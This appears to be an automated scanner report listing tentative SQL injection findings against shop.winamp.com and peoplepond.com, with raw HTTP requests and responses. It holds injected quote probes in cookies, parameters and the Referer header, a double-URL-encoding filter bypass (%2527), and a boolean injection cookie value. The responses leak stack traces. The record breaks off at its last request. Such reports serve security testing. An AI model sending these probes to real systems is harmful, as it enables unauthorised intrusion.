HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:04 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5171 Connection: close Content-Type: text/javascript
var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/_mint/?record&key=343430744850704d4435326e6e73383850754b394350495a4d61673231'; path = path.replace(/^https?:/, window.location.protocol);
// Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin].onsave) { path += this[developer][plugin].onsave(); }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime();
// Redirect to the debug page if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
var ie = /*@cc_on!@*/0; if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement)) { var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script'); tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElementsByTagName('head')[0].appendChild(tag); } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer; var resource = (window.decodeURI)?window.decodeURI(document.URL):document.URL; return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded; } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent.toLowerCase(); if (navigator.plug ...[SNIP]...
Request 2
GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d2--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:08 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5161 Connection: close Content-Type: text/javascript
var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/_mint/?record&key=383430353263524c3861594c76386f69676f565539326b31'; path = path.replace(/^https?:/, window.location.protocol);
// Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin].onsave) { path += this[developer][plugin].onsave(); }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime();
// Redirect to the debug page if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
var ie = /*@cc_on!@*/0; if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement)) { var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script'); tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElementsByTagName('head')[0].appendChild(tag); } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer; var resource = (window.decodeURI)?window.decodeURI(document.URL):document.URL; return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded; } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent.toLowerCase(); if (navigator.plugins && nav ...[SNIP]...
The BIGipServerp-drh-dc1pod5-pool1-active cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerp-drh-dc1pod5-pool1-active cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409894031,0) Date: Sun, 27 Feb 2011 17:47:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409894267,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF'; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409868347,0) Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF''; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409869490,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The Locale parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Locale parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101639964458,0) Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=101639965117,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704891155,0) Date: Sun, 27 Feb 2011 17:47:54 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 32916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: REQ_000002 at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:287) at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41) at ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=110230053450,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:55 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The ThemeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ThemeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300'&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=105934960573,0) Date: Sun, 27 Feb 2011 17:45:50 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... /store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ThemeID=1279300%27&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300''&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300%27%27&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=105934961726,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
1.19. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://shop.winamp.com
Path:
/store
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
